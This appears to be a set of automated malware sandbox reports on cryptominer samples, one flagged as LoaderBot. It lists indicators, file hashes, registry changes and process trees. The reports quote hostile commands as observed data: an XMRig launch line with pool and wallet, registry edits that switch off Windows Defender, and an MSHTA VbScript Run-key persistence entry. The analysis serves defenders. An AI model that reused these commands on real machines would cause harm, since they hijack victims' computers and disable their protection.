Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.195:3333 pool.supportxmr.com tcp

Files

memory/900-54-0x000007FEFC3B1000-0x000007FEFC3B3000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

MD5 a419d5d9882f43143818df7122c684a1
SHA1 63a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA512 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

memory/1892-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

MD5 a419d5d9882f43143818df7122c684a1
SHA1 63a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA512 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WinSec.exe

MD5 a419d5d9882f43143818df7122c684a1
SHA1 63a5ae4680d40c7c87d3b5b96317a8afbf42d071
SHA256 594fcf39f956a9e3c7563d0a5ba815ccba997568160008b82065474d62c1a9b7
SHA512 3d6fe541beffebb25c0bc5980a7b279c86d279b0ffbfcf5605535ec97be5b84ea6d7f0b7229fdb129dd6332e215c683e4853cf1306190489ef35f77580fea66a

memory/1892-59-0x0000000001380000-0x000000000192E000-memory.dmp

memory/1472-60-0x0000000000000000-mapping.dmp

memory/612-62-0x0000000000000000-mapping.dmp

memory/1384-61-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac590245904e4b02a2a0f76fee439591
SHA1 e89492ba719a7d0b55d1777d103c98a6050eb571
SHA256 f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19
SHA512 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac590245904e4b02a2a0f76fee439591
SHA1 e89492ba719a7d0b55d1777d103c98a6050eb571
SHA256 f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19
SHA512 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863

memory/2008-71-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 ac590245904e4b02a2a0f76fee439591
SHA1 e89492ba719a7d0b55d1777d103c98a6050eb571
SHA256 f8cd18c85c92cae966d1873ebc96d6d2efd0462ce8f598e651c15958bb159f19
SHA512 76b54989b4448d65e752fb173e448c4bfcc220c1ad3827855a42ff4d683e02d6b4aeae264a49a9d5cea46b1a2fe3c815efefbf71fb5a537031bcf362e078d863

memory/612-68-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

memory/1384-70-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

memory/2008-74-0x000007FEF34A0000-0x000007FEF3EC3000-memory.dmp

memory/1472-78-0x0000000002964000-0x0000000002967000-memory.dmp

memory/2008-79-0x0000000002714000-0x0000000002717000-memory.dmp

memory/1384-80-0x00000000029B4000-0x00000000029B7000-memory.dmp

memory/612-81-0x0000000002504000-0x0000000002507000-memory.dmp

memory/1472-75-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

memory/2008-76-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

memory/1384-77-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

memory/612-82-0x000007FEEC590000-0x000007FEED0ED000-memory.dmp

memory/612-86-0x000000001B740000-0x000000001BA3F000-memory.dmp

memory/1384-84-0x000000001B760000-0x000000001BA5F000-memory.dmp

memory/1472-85-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

memory/2008-83-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/2008-89-0x0000000002714000-0x0000000002717000-memory.dmp

memory/1472-92-0x0000000002964000-0x0000000002967000-memory.dmp

memory/2008-91-0x000000000271B000-0x000000000273A000-memory.dmp

memory/1384-90-0x00000000029B4000-0x00000000029B7000-memory.dmp

memory/1472-88-0x000000000296B000-0x000000000298A000-memory.dmp

memory/1472-87-0x0000000002964000-0x0000000002967000-memory.dmp

memory/1384-94-0x00000000029B4000-0x00000000029B7000-memory.dmp

memory/612-93-0x0000000002504000-0x0000000002507000-memory.dmp

memory/612-96-0x000000000250B000-0x000000000252A000-memory.dmp

memory/1384-95-0x00000000029BB000-0x00000000029DA000-memory.dmp

memory/612-97-0x0000000002504000-0x0000000002507000-memory.dmp

memory/612-98-0x000000000250B000-0x000000000252A000-memory.dmp

memory/1892-99-0x0000000000950000-0x00000000009C8000-memory.dmp

memory/1708-100-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-101-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-103-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-106-0x000000014070A480-mapping.dmp

memory/1708-105-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-107-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-108-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-109-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-111-0x00000000000F0000-0x0000000000104000-memory.dmp

memory/1708-110-0x0000000140000000-0x0000000140711000-memory.dmp

memory/1708-112-0x0000000000000000-0x0000000001000000-memory.dmp

memory/1708-113-0x0000000140000000-0x0000000140711000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win10v2004-20220812-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"

Signatures

LoaderBot

loader miner loaderbot

xmrig

miner xmrig

LoaderBot executable

Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe" C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe

"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 444 -p 1796 -ip 1796

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1796 -s 760

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

Network

Country Destination Domain Proto
US 52.109.13.62:443 tcp
US 204.79.197.200:443 tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.195:3333 pool.supportxmr.com tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 8.238.21.126:80 tcp
US 20.42.65.90:443 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp

Files

memory/4768-132-0x0000000000700000-0x0000000000AFE000-memory.dmp

memory/4768-133-0x0000000005740000-0x00000000057A6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1796-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1796-137-0x00000000001D0000-0x00000000001E4000-memory.dmp

memory/1796-138-0x0000000140000000-0x0000000140B75000-memory.dmp

memory/1796-139-0x0000000140000000-0x0000000140B75000-memory.dmp

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

MD5 02569a7a91a71133d4a1023bf32aa6f4
SHA1 0f16bcb3f3f085d3d3be912195558e9f9680d574
SHA256 8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512 534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

memory/1232-140-0x0000000000000000-mapping.dmp

memory/1232-143-0x0000000140000000-0x0000000140B75000-memory.dmp

memory/1232-144-0x00000000005D0000-0x00000000005F0000-memory.dmp

memory/1232-145-0x0000000140000000-0x0000000140B75000-memory.dmp

memory/1232-146-0x00000000020B0000-0x00000000020D0000-memory.dmp

memory/1232-147-0x00000000020B0000-0x00000000020D0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-09-07 13:02

Reported

2022-09-07 13:06

Platform

win10v2004-20220901-en

Max time kernel

129s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Perform\7za.exe N/A
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\Resources\NSudo.exe N/A
N/A N/A C:\Perform\nssm.exe N/A
N/A N/A C:\Perform\nssm.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Warn = "MSHTA VbScript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run CreateObject(\"\"Wscript.Shell\"\").RegRead(\"\"HKCU\\v1Elm0D\"\"), 0, False:close\")" C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Windows\System32\WScript.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome_debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Perform\7za.exe N/A
Token: 35 N/A C:\Perform\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Perform\7za.exe N/A
Token: SeSecurityPrivilege N/A C:\Perform\7za.exe N/A
Token: 18446744065119617044 N/A C:\Perform\Resources\NSudo.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A
N/A N/A C:\Perform\update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1284 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\202ad65f3956cde4764d1a789c3bac46a8b9dca3203c783a1efdc058bd94022f.exe C:\Windows\system32\cmd.exe
PID 4512 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 2248 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 3568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4512 wrote to memory of 4468 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
